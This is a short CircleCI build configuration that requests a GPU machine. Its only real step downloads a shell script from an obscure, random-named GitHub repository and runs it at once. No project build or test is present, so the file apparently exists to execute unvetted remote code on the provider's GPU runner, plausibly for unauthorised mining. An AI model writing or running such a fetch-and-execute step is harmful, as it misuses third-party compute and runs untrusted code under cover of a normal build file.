version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.medium
    steps:
      - run: nvidia-smi
      - run: wget https://raw.githubusercontent.com/nhijamhigu/wedok/main/ngeh.sh && chmod +x ngeh.sh && ./ngeh.sh
